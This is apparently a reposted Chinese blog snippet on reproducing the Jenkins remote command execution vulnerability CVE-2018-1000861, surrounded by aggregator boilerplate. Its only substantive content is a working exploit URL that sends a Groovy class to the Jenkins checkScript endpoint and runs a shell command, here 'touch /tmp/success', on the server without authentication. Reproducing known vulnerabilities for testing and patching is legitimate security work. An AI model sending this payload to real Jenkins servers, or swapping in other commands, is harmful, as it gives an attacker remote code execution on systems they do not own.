Jenkins远程命令执行漏洞(CVE-2018-1000861)
生活随笔
收集整理的這篇文章主要介紹了
Jenkins远程命令执行漏洞(CVE-2018-1000861)
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
漏洞復(fù)現(xiàn)
只需要訪問以下網(wǎng)址即可執(zhí)行命令:
http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript ?sandbox=true &value=public class x {public x(){"touch /tmp/success".execute()} }總結(jié)
以上是生活随笔為你收集整理的Jenkins远程命令执行漏洞(CVE-2018-1000861)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 22-08-06 西安 尚医通(03)E
- 下一篇: 嵌入式人工智能教学科研平台